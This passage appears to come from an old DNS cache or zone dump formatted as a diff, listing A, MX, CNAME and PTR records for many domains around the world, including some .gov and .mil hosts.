209.198.103.198 +mail IN CNAME gro.dd.org. +localhost IN A 127.0.0.1 +dhcp2 IN A 209.198.103.195 +www IN CNAME gro.dd.org. +dhcp3 IN A 209.198.103.196 +dhcp4 IN A 209.198.103.197 +moderators IN CNAME moderators.isc.org. +ns IN CNAME gro.dd.org. +$ORIGIN gazpacho.org. +keith IN A 209.67.235.37 +sure IN A 209.67.235.38 +$ORIGIN FLAME.org. +DNS02 IN A 204.152.184.97 +www IN A 204.152.184.97 +DNS01 IN A 204.152.184.80 +$ORIGIN giffordmed.org. +mail IN A 130.189.100.51 +$ORIGIN isc.org. +isrv3-i IN A 204.152.184.87 +$ORIGIN energyenhancement.org. +www IN A 216.121.175.228 +$ORIGIN icann.org. +mailhub IN A 192.0.34.33 +mail IN A 198.32.1.99 +$ORIGIN PAPP.UNDP.org. +PAPPSRV IN A 192.115.229.1 +$ORIGIN xaos.org. 
+amethyst IN A 204.145.159.12 + IN MX 0 mail.xaos.org. + IN MX 5 gw.xaos.org. +sure IN A 209.67.235.38 +taiyoo IN A 204.145.159.13 + IN MX 0 mail.xaos.org. + IN MX 5 gw.xaos.org. +gw IN A 24.93.15.22 +reimei IN A 204.145.159.17 + IN MX 0 mail.xaos.org. + IN MX 5 gw.xaos.org. +gwi IN A 204.145.159.2 + IN HINFO "Firewall" "Gateway" + IN MX 0 mail.xaos.org. + IN MX 5 gw.xaos.org. +keith IN A 209.67.235.37 +axis IN A 204.145.159.20 +mail IN CNAME furii.xaos.org. +all IN A 24.95.203.33 + IN MX 0 mail.xaos.org. + IN MX 5 gw.xaos.org. +www IN CNAME gw.xaos.org. +kadou IN A 204.145.159.14 + IN MX 0 mail.xaos.org. + IN MX 5 gw.xaos.org. +furii IN A 204.145.159.11 + IN MX 0 mail.xaos.org. + IN MX 5 gw.xaos.org. +ftp IN CNAME gw.xaos.org. +gwe IN CNAME gw.xaos.org. +$ORIGIN PUNCHDOWN.org. +NS IN A 140.174.131.100 +$ORIGIN mmuuf.org. +www IN MX 10 gro.dd.org. + IN A 209.198.103.205 +$ORIGIN OPEN-RSC.org. +ASLAN IN A 199.5.157.128 +UNICORN IN A 207.126.103.16 +$ORIGIN COGNOSCENTI.org. +SYNAESTHESIA IN A 207.208.112.4 +ANAESTHESIA IN A 207.208.112.3 +$ORIGIN DC.IGC.org. +NS IN A 199.75.208.10 +$ORIGIN mitre.org. +DNSSRV1X IN A 199.94.97.51 +mbunix IN A 199.94.97.52 +DNSSRV3X IN A 198.76.173.100 +smtpproxy1 IN A 129.83.20.90 +linus IN A 129.83.10.1 + IN MX 1 linus.mitre.org. + IN MX 5 smtpproxy1.mitre.org. + IN MX 10 smtpproxy2.mitre.org. +smtpproxy2 IN A 128.29.154.90 +mwunix IN A 198.76.173.52 +$ORIGIN reptiles.org. +mail IN A 198.96.117.157 +NS2 IN A 192.75.253.138 +NS IN A 198.96.117.136 +$ORIGIN ISPC.org. +NS2 IN A 209.124.64.11 +NS3 IN A 207.230.32.23 +NS1 IN A 207.106.7.7 +$ORIGIN IGC.APC.org. +NS1 IN A 192.82.108.38 +$ORIGIN iscvt.org. +isc-01 IN A 207.136.209.131 +$ORIGIN FLIRBLE.org. +NS0 IN A 195.40.6.20 +$ORIGIN SANS.org. +SERVER1 IN A 167.216.133.33 +$ORIGIN LTWCC.org. +NS2 IN A 12.33.66.62 +NS1 IN A 12.33.66.61 +$ORIGIN CMHNET.org. +elektro IN A 192.188.133.3 +$ORIGIN SNPT.KM. +BOW IN A 195.101.19.253 +$ORIGIN ONPT.NET.MA. 
+MASSIRA IN A 206.103.26.1 +$ORIGIN IAM.NET.MA. +DNS2 IN A 212.217.0.12 +DNS3 IN A 212.217.1.1 +DNS1 IN A 212.217.0.1 +$ORIGIN KREONET.RE.KR. +NS IN A 134.75.30.1 +$ORIGIN KREN.NE.KR. +NS IN A 147.47.1.1 +$ORIGIN NIC.LK. +NS IN A 192.248.1.65 +$ORIGIN NIC.MC. +NS IN A 195.78.6.131 +$ORIGIN 110.16.12.IN-ADDR.ARPA. +35 IN CNAME 35.32/27.110.16.12.in-addr.arpa. +$ORIGIN 32/27.110.16.12.IN-ADDR.ARPA. +35 IN PTR mail.nova-data.com. +$ORIGIN 0.0.127.IN-ADDR.ARPA. +1 IN PTR localhost. +$ORIGIN 184.152.204.IN-ADDR.ARPA. +87 IN PTR isrv3-i.isc.org. +$ORIGIN 187.152.204.IN-ADDR.ARPA. +59 IN PTR shell.nominum.com. +$ORIGIN 131.127.204.IN-ADDR.ARPA. +47 IN PTR mtiwmhc22.worldnet.att.net. +$ORIGIN 198.245.204.IN-ADDR.ARPA. +90 IN PTR maus.spack.org. +$ORIGIN 159.145.204.IN-ADDR.ARPA. +12 IN PTR amethyst.xaos.org. +13 IN PTR taiyoo.xaos.org. +14 IN PTR kadou.xaos.org. +17 IN PTR reimei.xaos.org. +20 IN PTR axis.xaos.org. +2 IN PTR gwi.xaos.org. +11 IN PTR furii.xaos.org. +$ORIGIN 241.5.198.IN-ADDR.ARPA. +38 IN PTR cmr0.ash.ops.us.uu.net. +39 IN PTR cmr1.ash.ops.us.uu.net. +$ORIGIN 241.103.199.IN-ADDR.ARPA. +218 IN PTR abyssinian.sleepycat.com. +$ORIGIN 153.66.206.IN-ADDR.ARPA. +12 IN PTR d.dd.org. +102 IN PTR gro.dd.org. +128 IN PTR www.vmba.org. +1 IN PTR workgroup.dd.org. +2 IN PTR doubt.dd.org. +136 IN PTR www.mmuuf.org. +4 IN PTR nila.dd.org. +10 IN PTR go.dd.org. +$ORIGIN 84.198.209.IN-ADDR.ARPA. +242 IN PTR dlawren-gw.burl.sover.net. +$ORIGIN 87.198.209.IN-ADDR.ARPA. +52 IN PTR mqueue0.sover.net. +$ORIGIN 103.198.209.IN-ADDR.ARPA. +198 IN CNAME 198.192.103.198.209.in-addr.arpa. +205 IN CNAME 205.192.103.198.209.in-addr.arpa. +199 IN CNAME 199.192.103.198.209.in-addr.arpa. +206 IN CNAME 206.192.103.198.209.in-addr.arpa. +193 IN CNAME 193.192.103.198.209.in-addr.arpa. +200 IN CNAME 200.192.103.198.209.in-addr.arpa. +201 IN CNAME 201.192.103.198.209.in-addr.arpa. +$ORIGIN 192.103.198.209.IN-ADDR.ARPA. +202 IN PTR fraud.dd.org. +195 IN PTR dhcp2.dd.org. 
+203 IN PTR fraud.dd.org. +196 IN PTR dhcp3.dd.org. +204 IN PTR ppp.dd.org. +197 IN PTR dhcp4.dd.org. +205 IN PTR www.mmuuf.org. +198 IN PTR go.dd.org. +206 IN PTR www.vmba.org. +199 IN PTR d.dd.org. +207 IN PTR broadcast.dd.org. +200 IN PTR gro.dd.org. +193 IN PTR doubt.dd.org. +201 IN PTR workgroup.dd.org. +194 IN PTR dhcp1.dd.org. +$ORIGIN 133.188.192.IN-ADDR.ARPA. +3 IN PTR elektro.com. +$ORIGIN 206.203.192.IN-ADDR.ARPA. +9 IN PTR ice.WonderWorks.COM. +$ORIGIN 2.39.137.IN-ADDR.ARPA. +3 IN PTR New-York4.NY.ALTER.NET. +$ORIGIN 126.39.137.IN-ADDR.ARPA. +10 IN PTR Fddi0-0.New-York4.NY.ALTER.NET. +$ORIGIN IRD.MG. +ANTANA IN A 194.214.107.1 +$ORIGIN NIC.MG. +NS IN A 194.214.107.253 +$ORIGIN KW. +DNS2 IN A 161.252.48.150 +DNS1 IN A 161.252.48.140 +$ORIGIN MOC.KW. +NCC IN A 196.1.69.98 +$ORIGIN NET.NA. +GRUMPY IN A 196.20.23.1 +$ORIGIN RELCOM.KZ. +NS IN A 212.110.240.65 +$ORIGIN MARNET.MK. +KITKA IN A 194.149.131.2 +$ORIGIN SC-UNI.KTU.LT. +NEMUNAS IN A 193.219.32.13 +$ORIGIN SOTELMA.ML. +ASKIA IN A 208.144.230.3 +$ORIGIN DNS.LU. +NS2 IN A 158.64.229.3 +NS5 IN A 194.246.96.193 +NS1 IN A 158.64.229.2 +$ORIGIN INTNET.NE. +BOW IN A 194.51.164.253 +$ORIGIN MN. +MAGIC IN A 202.131.0.10 +$ORIGIN NF. +NS2 IN A 203.12.249.101 +NS1 IN A 203.12.249.100 +$ORIGIN LATNET.LV. +NS2 IN A 159.148.108.1 +NS IN A 159.148.60.2 +$ORIGIN UMAC.MO. +UMACSN2 IN A 161.64.3.2 +NS2 IN A 161.64.7.2 +UMACSN1 IN A 161.64.3.1 +NS1 IN A 161.64.7.1 +$ORIGIN NI. +NS IN A 165.98.1.2 + IN A 200.30.36.8 +$ORIGIN TMX.COM.NI. +NS IN A 205.218.253.2 +$ORIGIN UNIV-NKC.MR. +DNS2 IN A 193.251.145.154 +DNS1 IN A 193.251.145.155 +$ORIGIN SVIANED.nl. +NS IN A 143.177.1.3 +$ORIGIN secondary.nl. +ns2 IN A 194.229.138.6 +$ORIGIN DOMAIN-REGISTRY.nl. +NS2 IN A 193.176.144.130 +NS IN A 193.176.144.2 +$ORIGIN MT. +NS IN A 193.188.47.252 +$ORIGIN DHIRAAGU.MV. +NS IN A 202.1.192.196 +$ORIGIN NO. +NAC IN A 129.240.2.40 +ALCANET IN MX 15 tyholt.uninett.no. + IN MX 20 nac.no. + IN A 158.39.5.5 +$ORIGIN UIO.NO. 
+IFI IN A 129.240.64.2 +$ORIGIN SOL.NO. +NS1 IN A 195.225.2.10 +$ORIGIN uit.NO. +benoni IN A 129.242.4.254 +$ORIGIN ALCANET.NO. +NS IN A 193.213.238.10 +$ORIGIN UNINETT.NO. +aun IN A 129.241.1.99 +tyholt IN A 158.38.60.10 +NN IN A 158.38.0.181 +$ORIGIN alcatel.NO. +ns2 IN A 193.213.238.2 +$ORIGIN UNINET.NET.MX. +MEX1-M-213 IN A 200.33.146.213 +$ORIGIN AVANTEL.NET.MX. +DNS1 IN A 200.33.213.66 +$ORIGIN UNAM.MX. +NS IN A 132.248.253.1 +$ORIGIN NIC.MX. +NS IN A 200.23.1.1 +$ORIGIN MOS.COM.NP. +SHIKHAR IN A 202.52.255.5 +$ORIGIN MY. +MIMOS IN A 192.228.128.18 +JARING IN A 192.228.128.20 +$ORIGIN JARING.MY. +GATEN IN A 161.142.227.17 +GATE1 IN A 161.142.2.17 +$ORIGIN PA. +NS IN A 168.77.8.2 +$ORIGIN USMA.AC.PA. +VASCO IN A 208.141.92.2 +$ORIGIN UEM.MZ. +ZEBRA IN A 196.3.96.67 +OCEANO IN A 196.3.96.69 +DZOWO IN A 196.3.96.66 +$ORIGIN CENPAC.NET.NR. +NRWEB IN A 203.98.224.66 +$ORIGIN NIC.NU. +NS IN A 128.11.47.50 +$ORIGIN DE.NIC.NU. +NS0 IN A 216.200.116.40 +$ORIGIN TELIA.NIC.NU. +NS0 IN A 212.181.91.4 +$ORIGIN NS.NIC.NU. +NZ IN A 203.97.132.66 +$ORIGIN OMANTEL.NET.OM. +OM4 IN A 206.49.101.5 +OM10 IN A 206.49.101.6 +$ORIGIN RCP.NET.PE. +ICHU IN A 161.132.5.14 +$ORIGIN MANA.PF. +NS2 IN A 202.3.225.20 +NS1 IN A 202.3.225.10 +$ORIGIN QATAR.NET.QA. +NS2 IN A 212.77.192.13 +NS3 IN A 212.77.192.15 +NS1 IN A 212.77.192.10 +$ORIGIN CLEAR.NET.NZ. +NS2 IN A 203.97.37.14 +NS1 IN A 203.97.33.14 +$ORIGIN DNS.NET.NZ. +NS1 IN A 202.46.161.3 +$ORIGIN IHUG.NET.NZ. +NS2 IN A 203.29.160.2 +$ORIGIN XTRA.CO.NZ. +GORGON IN A 202.27.158.34 +$ORIGIN WAIKATO.AC.NZ. +NS99 IN A 130.217.76.27 +$ORIGIN VUW.AC.NZ. +RATA IN A 130.195.2.11 +$ORIGIN MCS.VUW.AC.NZ. +DOWNSTAGE IN A 130.195.6.10 +CIRCA IN A 130.195.5.12 +$ORIGIN PL. +from IN A 212.160.132.114 +$ORIGIN NASK.ORG.PL. +BILBO IN A 148.81.16.51 + IN A 195.187.245.51 +$ORIGIN pbks.PL. +alf IN A 195.205.33.200 +$ORIGIN CYFRONET.KRAKOW.PL. +NMS IN A 149.156.1.3 +$ORIGIN MAN.LODZ.PL. +DNS2 IN A 212.51.192.5 +$ORIGIN ispid.com.PL. 
+trurl IN A 195.150.99.3 +$ORIGIN itnet.com.PL. +emerald IN A 195.116.64.3 +$ORIGIN ELEKTRON.PL. +AMBER IN A 195.117.6.10 +$ORIGIN macrosoft.WAW.PL. +front IN A 194.196.86.66 +$ORIGIN NASK.WAW.PL. +ARWENA IN A 193.59.201.28 +$ORIGIN webtech.elk.PL. +tornado IN A 212.244.162.100 +$ORIGIN IKP.PL. +NS3 IN A 157.25.5.30 +$ORIGIN TPSA.PL. +DNS2 IN A 194.204.152.34 +$ORIGIN uwm.EDU.PL. +matrix IN A 213.184.3.136 +$ORIGIN FUW.EDU.PL. +DNS IN A 193.0.80.11 +$ORIGIN UPRR.PR. +PASCAL IN A 134.202.1.120 +DESCARTES IN A 134.202.1.125 +$ORIGIN NCC.UP.PT. +CIUP1 IN A 193.136.51.52 +$ORIGIN FCCN.PT. +DNS IN A 193.136.192.10 +$ORIGIN DNS.PT. +NS IN A 193.136.0.1 +$ORIGIN TELEPAC.PT. +NS1 IN A 194.65.3.20 +VIVALDI IN A 194.65.3.21 +$ORIGIN CNC.UNA.PY. +SCE IN A 200.10.228.133 +NS IN A 200.10.228.132 +$ORIGIN ISU.NET.SA. +NS1 IN A 212.26.18.3 +$ORIGIN KACST.EDU.SA. +NS IN A 212.26.44.3 +$ORIGIN COM.SB. +PIJIN IN A 202.139.42.10 +$ORIGIN SOLOMON.COM.SB. +OLKETA IN A 202.139.42.4 +$ORIGIN cafax.SE. +ns IN A 192.71.228.17 +$ORIGIN LTH.SE. +NIC IN A 130.235.20.3 +$ORIGIN SUNET.SE. +SUNIC IN A 192.36.125.2 +$ORIGIN PACIFIC.NET.SG. +NS1 IN A 192.169.33.3 +$ORIGIN NIC.NET.SG. +DS IN A 202.42.194.205 +$ORIGIN SINGNET.COM.SG. +DNSSEC2 IN A 195.13.10.226 +DNSSEC3 IN A 165.21.100.11 +DNSSEC1 IN A 165.21.83.11 +$ORIGIN RNC.RO. +NS-A IN A 192.162.16.31 +NS IN A 192.162.16.21 +$ORIGIN NIC.SH. +NS IN A 194.205.62.60 +$ORIGIN ARNES.SI. +KANIN IN A 193.2.1.66 +SREBRNJAK IN A 193.2.1.91 +$ORIGIN INTERNET.SK. +NS IN A 192.108.130.91 +$ORIGIN EUNET.SK. +NS IN A 192.108.130.33 +$ORIGIN NETLAB.SK. +NS IN A 195.168.1.4 +$ORIGIN SIERRATEL.SL. +NS IN A 194.133.124.5 +$ORIGIN INTNET.TD. +BOW IN A 193.251.147.253 +$ORIGIN RU. +ok IN A 195.2.83.162 + IN MX 50 mail.ok.ru. + IN MX 100 relay1.aha.ru. + IN MX 300 relay3.aha.ru. +$ORIGIN aha.RU. +ns1 IN A 195.2.80.142 +$ORIGIN ok.RU. +mail IN A 195.2.83.162 +ns IN A 195.2.64.36 +$ORIGIN INTELCOM.SM. +DNS IN A 194.183.64.11 +$ORIGIN OMNIWAY.SM. 
+DNS IN A 194.183.64.10 +$ORIGIN UCAD.SN. +NS IN A 196.1.95.1 +$ORIGIN NIC.TJ. +NS2 IN A 209.77.224.1 +NS1 IN A 209.77.250.1 +$ORIGIN SPB.SU. +NS IN A 193.124.83.69 +$ORIGIN RICC.ALMA-ATA.SU. +NS IN A 194.87.112.4 +$ORIGIN DEMOS.SU. +NS IN A 194.87.0.8 + IN A 194.87.0.9 +$ORIGIN RED.SV. +CIR IN A 168.243.254.1 +$ORIGIN GOB.SV. +CONACYT IN A 168.243.64.2 +ANTEL IN A 168.243.65.1 +$ORIGIN ATI.TN. +NS IN A 193.95.66.10 +$ORIGIN TO. +TONIC IN A 206.184.59.10 +COLO IN A 206.86.247.253 +$ORIGIN TDC.TO. +NS1 IN A 206.86.247.250 +$ORIGIN SY. +EARTH IN A 195.22.198.6 +$ORIGIN VATICAN.VA. +MICHAEL IN A 212.77.0.2 +$ORIGIN METU.EDU.TR. +NS2 IN A 144.122.199.93 +NS1 IN A 144.122.199.90 +$ORIGIN NIC.UK. +NS1 IN A 195.66.240.130 +$ORIGIN AXION.BT.CO.UK. +DNS0 IN A 132.146.5.1 +$ORIGIN ADVSYS.CO.UK. +BARNEY IN A 194.72.124.2 +$ORIGIN WR.UMIST.AC.UK. +AARDVARK IN A 130.88.146.3 + IN A 128.16.5.31 + IN MX 10 bells.cs.ucl.ac.uk. + IN MX 11 haig.cs.ucl.ac.uk. +$ORIGIN CS.UCL.AC.UK. +haig IN A 128.16.6.8 +bells IN A 128.16.5.31 +NS1 IN A 128.16.5.32 +$ORIGIN surrey.AC.UK. +info-server IN A 131.227.102.6 +eim IN MX 6 phoebe.eim.surrey.ac.uk. + IN MX 6 prue.eim.surrey.ac.uk. +$ORIGIN eim.surrey.AC.UK. +prue IN A 131.227.76.5 +phoebe IN A 131.227.74.4 +$ORIGIN MHS-RELAY.AC.UK. +SUN IN A 128.86.8.25 +$ORIGIN NIC.TT. +DNS IN A 24.3.198.194 +$ORIGIN REACCIUN.VE. +DNS2 IN A 150.188.4.212 +DNS IN A 150.188.4.210 +$ORIGIN ULA.VE. +AZMODAN IN A 150.185.130.16 +$ORIGIN UTZ. +NS2 IN A 160.124.112.10 +NS3 IN A 160.124.147.1 +NS1 IN A 160.124.48.4 +$ORIGIN NIC.TV. +NS4 IN A 207.151.24.23 +NS2 IN A 208.184.1.167 +NS6 IN A 64.56.165.153 +NS7 IN A 64.69.172.153 +NS1 IN A 209.143.242.138 +$ORIGIN EDU.TW. +MOEVAX IN A 140.111.1.2 +$ORIGIN vt.us. +state IN MX 10 mx1.state.vt.us. + IN MX 10 mx2.state.vt.us. +$ORIGIN k12.vt.us. +ns2 IN A 170.222.64.130 +morristown IN MX 0 mail.k12.vt.us. +ns1 IN A 170.222.64.130 +jericho IN MX 0 mail.k12.vt.us. +founders IN MX 0 mail.k12.vt.us. +$ORIGIN state.vt.us. 
+srs IN A 159.105.101.150 + IN MX 0 srs.srs.state.vt.us. + IN MX 10 mx1.state.vt.us. + IN MX 10 mx2.state.vt.us. +defgen IN MX 0 mail.state.vt.us. + IN MX 10 mx1.state.vt.us. + IN MX 10 mx2.state.vt.us. + IN MX 5 vtagr02.agr.state.vt.us. + IN MX 15 mx1.state.vt.us. + IN MX 20 mx2.state.vt.us. +mail IN A 170.222.64.134 +ns1 IN A 159.105.23.130 +ns2 IN A 170.222.64.130 +$ORIGIN srs.state.vt.us. +srs IN A 159.105.101.150 +$ORIGIN agr.state.vt.us. +vtagr04 IN A 159.105.50.4 +vtagr02 IN A 159.105.50.2 +$ORIGIN anr.state.vt.us. +dec IN MX 10 mx1.state.vt.us. + IN MX 10 mx2.state.vt.us. + IN MX 0 dec.anr.state.vt.us. + IN A 159.105.46.4 +$ORIGIN pha.pa.us. +candle IN A 162.33.245.46 +$ORIGIN CNRI.reston.va.us. +NS IN A 132.151.1.1 +$ORIGIN boston.MA.us. +foxharp IN MX 10 bparker.connactivity.com. +$ORIGIN ns.foxharp.boston.MA.us. +a IN A 24.147.209.205 +$ORIGIN STARFIRE.DOUGLAS.MA.us. +NS2 IN A 216.129.136.9 +DNS IN A 206.225.44.40 +NS1 IN A 216.129.136.9 +$ORIGIN NIC.us. +USDNS IN A 198.41.3.87 +$ORIGIN sf.ca.us. +asylum IN A 192.48.232.17 +$ORIGIN palo-alto.ca.us. +mejac IN A 192.147.236.1 +$ORIGIN VN. +DNS1 IN A 203.162.3.235 +$ORIGIN EDU.UY. +SECIU IN A 164.73.128.5 +$ORIGIN UZ. +NS IN A 213.68.88.11 +$ORIGIN NOC.UZ. +NS IN A 194.67.52.42 +$ORIGIN VANUATU.COM.VU. +SANTO IN A 202.139.40.7 +FUTUNA IN A 202.139.40.3 +EFATE IN A 202.139.40.5 +$ORIGIN nic.mnet. +ns2 IN A 208.109.83.110 +ns1 IN A 216.61.39.172 +$ORIGIN DNS.WS. +NS4 IN A 216.52.234.102 +NS2 IN A 216.35.187.250 +NS1 IN A 202.4.48.217 +NS5 IN A 216.35.188.8 +NS3 IN A 216.52.234.99 +$ORIGIN UCT.AC.ZA. +UCTHPX IN A 137.158.128.1 +$ORIGIN FRD.AC.ZA. +APIES IN A 137.214.80.1 +$ORIGIN EE.UND.AC.ZA. +DAISY IN A 146.230.192.18 +$ORIGIN RU.AC.ZA. +HIPPO IN A 146.231.128.1 +$ORIGIN UNZA.ZM. +PUKU IN A 196.7.240.1 +$ORIGIN NIC.YU. +NS1 IN A 147.91.8.6 +$ORIGIN TELEKOM.YU. +ODISEJ IN A 195.178.32.2 +$ORIGIN gtld-servers.ORSC. +b IN A 216.13.126.116 +$ORIGIN ROOT-SERVERS.ORSC. 
+B IN A 216.13.126.116 +C IN A 65.196.80.102 +A IN A 199.166.24.1 +$ORIGIN ZPTC.CO.ZW. +TELCOM IN A 194.133.122.47 +$ORIGIN NIPR.MIL. +PAC2 IN A 199.252.155.234 +EUR2 IN A 199.252.143.234 +CON2 IN A 199.252.173.234 +PAC1 IN A 199.252.180.234 +EUR1 IN A 199.252.154.234 +CON1 IN A 199.252.175.234 +$ORIGIN ARL.MIL. +ADMII IN A 128.63.31.4 + IN A 128.63.5.4 +$ORIGIN GOV. +nps IN MX 5 ccmail.itd.nps.gov. + IN MX 10 ccmail2.itd.nps.gov. +$ORIGIN STAT-USA.GOV. +SUNNY IN A 192.239.70.8 +$ORIGIN NASA.GOV. +jpl IN A 137.78.160.180 +NASANS4 IN A 198.116.144.33 +NASANS3 IN A 198.116.144.49 +NASANS1 IN A 192.77.84.32 +$ORIGIN NSI.NASA.GOV. +MX IN A 128.102.18.31 +$ORIGIN CDC.GOV. +NS2 IN A 198.246.96.92 +NS1 IN A 198.246.96.61 +$ORIGIN NIST.GOV. +NS1 IN A 129.6.13.2 +$ORIGIN cr.USGS.GOV. +ISDSUN IN A 136.177.16.3 +ns IN A 136.177.16.3 +rgfsparc IN A 136.177.164.192 +$ORIGIN ER.USGS.GOV. +NS IN A 130.11.48.2 +$ORIGIN WR.USGS.GOV. +ISDMNL IN A 130.118.4.2 +$ORIGIN DEN.nps.GOV. +DENS20 IN A 165.83.24.20 +$ORIGIN ITD.nps.GOV. +BIGBIRD IN A 165.83.208.5 +$ORIGIN AKSO.nps.GOV. +INPAKSODNS IN A 165.83.49.9 +$ORIGIN WRO.nps.GOV. +VANILLA IN A 165.83.71.3 +$ORIGIN NCC.nps.GOV. +OWL IN A 165.83.34.60 +$ORIGIN net. +FIREHOUSE IN A 63.160.175.19 +gbch IN MX 0 maxim.gbch.net. +VERMONTEL IN A 63.167.45.2 + IN MX 0 pop.vermontel.net. +reedmedia IN A 63.145.197.178 +goldstats IN A 66.33.12.17 +zama IN A 203.142.132.46 +helicon IN A 63.93.137.2 +wetlogic IN MX 10 athome.wetlogic.net. +188 IN A 202.96.125.100 + IN A 202.96.125.101 + IN MX 10 mx2.188.net. + IN MX 20 smtp.188.net. + IN MX 10 mx1.188.net. +valley IN MX 0 lebanon.valley.net. +primary IN A 216.87.34.253 +SOVER IN A 209.198.87.53 + IN A 209.198.87.34 + IN MX 10 mail.sover.net. + IN MX 20 mqueue.sover.net. +UU IN MX 10 external-mail-router.UU.NET. +connriver IN A 63.93.137.13 + IN MX 10 ns.hcr.net. + IN MX 1 mailer.connriver.net. +SHOREHAM IN A 199.170.121.2 +$ORIGIN cinenet.net. +NS1 IN A 198.147.76.65 +$ORIGIN TOGETHER.net. 
+NS2 IN A 204.97.120.31 +NS1 IN A 204.97.120.30 +$ORIGIN IPHIL.net. +MAKISIG IN A 203.176.28.135 +$ORIGIN PLANET-THREE.net. +NS2 IN A 212.49.219.190 +$ORIGIN FIREHOUSE.net. +DNS2 IN A 63.160.175.18 +DNS1 IN A 63.160.175.19 +$ORIGIN space.net. +ns IN A 195.30.0.1 +$ORIGIN DNS.space.net. +NS4 IN A 195.222.210.93 +NS3 IN A 193.149.44.49 +$ORIGIN ALASKA.net. +NS4-AUTH IN A 209.112.130.4 +NS1-AUTH IN A 209.112.160.4 +$ORIGIN FWIDCSERVICES.net. +DEN-NS2 IN A 216.7.160.32 +IRV-NS1 IN A 216.23.160.51 +DEN-NS1 IN A 216.7.160.31 +NS1 IN A 64.78.224.58 +$ORIGIN BIJT.net. +PAN IN A 213.196.2.97 +$ORIGIN SEABONE.net. +DNS IN A 195.22.205.163 +$ORIGIN SPIN.OMNES.net. +NS IN A 192.23.90.196 +$ORIGIN VERIO.net. +NS2 IN A 129.250.31.190 +NS0 IN A 129.250.15.61 +NS1 IN A 204.91.99.140 +$ORIGIN NS.VERIO.net. +B IN A 129.250.35.32 +T IN A 192.67.14.16 +$ORIGIN GNOSH.net. +GRIN IN A 216.15.87.207 +$ORIGIN NEASE.net. +NS2 IN A 202.103.134.4 +$ORIGIN CRSNIC.net. +NS1 IN A 198.41.3.39 +$ORIGIN VERISIGN.net. +MODOR IN A 205.139.94.55 +CITADEL IN A 205.139.94.15 +PAGOSA IN A 205.139.94.16 +KAOS IN A 208.202.137.126 +$ORIGIN terra.net. +ns2 IN A 199.103.128.2 +ns1 IN A 199.103.128.1 +$ORIGIN ADMONITOR.net. +NS-2 IN A 216.35.185.40 +ads IN A 216.35.185.145 +SC-NS1 IN A 64.70.20.85 +$ORIGIN NORDU.net. +SERVER IN A 193.10.252.19 +$ORIGIN TELEGLOBE.net. +CASTOR IN A 199.202.55.2 +$ORIGIN sodak.net. +NS2 IN A 63.65.239.225 +RINGNECK IN A 63.65.238.65 +$ORIGIN gbch.net. +MAXIM IN A 203.9.155.249 +$ORIGIN VERMONTEL.net. +pop IN CNAME loomis.vermontel.net. +NS2 IN A 204.164.106.8 +loomis IN A 204.164.106.19 +NS1 IN A 204.164.106.2 +$ORIGIN farm.net. +ns IN A 216.112.179.160 +$ORIGIN NAP.net. +NS2 IN A 206.54.224.1 +$ORIGIN AH.net. +NS4 IN A 203.21.205.20 +NS2 IN A 203.21.205.1 +$ORIGIN NS.GDNS.net. +LHR IN A 212.250.25.101 +DCA IN A 209.207.221.1 +$ORIGIN CONCENTRIC.net. 
+NAMESERVER1 IN A 207.155.183.73 +NAMESERVER3 IN A 206.173.119.72 +NAMESERVER IN A 207.155.183.72 +NIC2 IN A 207.88.60.5 +NAMESERVER2 IN A 207.155.184.72 +$ORIGIN att.net. +worldnet IN A 199.70.151.234 +$ORIGIN worldnet.att.net. +ns3 IN A 204.127.160.1 +ns4 IN A 204.127.160.2 +mtiwmhc22 IN A 204.127.131.47 +ns1 IN A 204.127.129.1 +ns IN A 204.127.160.2 + IN A 12.102.240.1 + IN A 12.102.240.2 + IN A 12.102.244.1 + IN A 12.102.244.2 + IN A 204.127.129.1 + IN A 204.127.129.2 + IN A 204.127.160.1 +ns2 IN A 204.127.129.2 +$ORIGIN OR.BR.NP.ELS-GMS.att.net. +ORCU IN A 199.191.129.139 +$ORIGIN WY.BR.NP.ELS-GMS.att.net. +WYCU IN A 199.191.128.43 +$ORIGIN OH.MT.NP.ELS-GMS.att.net. +OHCU IN A 199.191.144.75 +$ORIGIN MA.MT.NP.ELS-GMS.att.net. +MACU IN A 199.191.145.136 +$ORIGIN MT.NS.ELS-GMS.att.net. +CMTU IN A 12.127.16.69 +DMTU IN A 12.127.16.70 +$ORIGIN BR.NS.ELS-GMS.att.net. +CBRU IN A 199.191.128.105 +DBRU IN A 199.191.128.106 +$ORIGIN LEB.net. +NS IN A 206.127.55.2 +$ORIGIN SEG.net. +NS2 IN A 206.34.181.16 +NS1 IN A 206.34.181.15 +$ORIGIN romkey.SEG.net. +ip1 IN A 207.121.69.234 +$ORIGIN ync.net. +NS4 IN A 206.185.20.9 +NS2 IN A 216.34.185.21 +NS5 IN A 206.185.20.10 +NS3 IN A 206.185.20.8 +ns1 IN A 216.34.185.20 +$ORIGIN GLOBECOMM.net. +NS2 IN A 165.251.1.3 +NS1 IN A 165.251.1.2 +$ORIGIN PREP.net. +DNS-EAST IN A 129.250.252.10 +$ORIGIN EARTHLINK.net. +NS4 IN A 209.179.179.19 +DNS2 IN A 207.217.77.12 +DNS3 IN A 207.217.120.13 +DNS4 IN A 209.179.179.18 +NS1 IN A 207.217.126.41 +NS2 IN A 207.217.77.42 +$ORIGIN SPRINTLINK.net. +NS3-AUTH IN A 144.228.255.10 +NS2-AUTH IN A 144.228.254.10 +NS1-AUTH IN A 206.228.179.10 +$ORIGIN OP.net. +NS1 IN A 209.152.193.4 +$ORIGIN CERNET.net. +NS IN A 202.112.0.44 +$ORIGIN zenon.net. +dns IN A 195.2.83.107 +$ORIGIN INFI.net. +NS3 IN A 205.219.239.5 +NS4 IN A 216.33.106.19 +NS001 IN A 208.131.160.201 +NS1 IN A 198.22.1.107 +NS2 IN A 198.22.1.108 +$ORIGIN vh8.INFI.net. 
